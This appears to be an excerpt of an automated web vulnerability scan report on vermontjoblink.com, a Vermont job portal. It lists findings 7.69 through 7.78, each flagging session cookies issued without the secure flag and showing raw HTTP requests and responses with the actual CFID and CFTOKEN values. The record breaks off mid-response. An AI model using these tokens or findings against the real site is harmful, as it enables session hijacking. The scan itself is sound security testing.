<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.69. https://www.vermontjoblink.com/ada/404/404_qry.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/404/404_qry.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:01 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.70. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/eeoislaw.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/customization/Vermont/documents/eeoislaw.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.71. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/documents/privacy.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/customization/Vermont/documents/privacy.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.72. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/customization/Vermont/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/customization/Vermont/favicon.ico HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:06:59 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada/404/404_qry.cfm
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

7.73. https://www.vermontjoblink.com/ada/default.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/default.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.74. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/etp/etp_newuser_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:11:56'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.75. https://www.vermontjoblink.com/ada/leavesite.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/leavesite.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/leavesite.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.76. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_eligibility_dsp.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.77. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

7.78. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_login_fnc.cfm

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:14:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
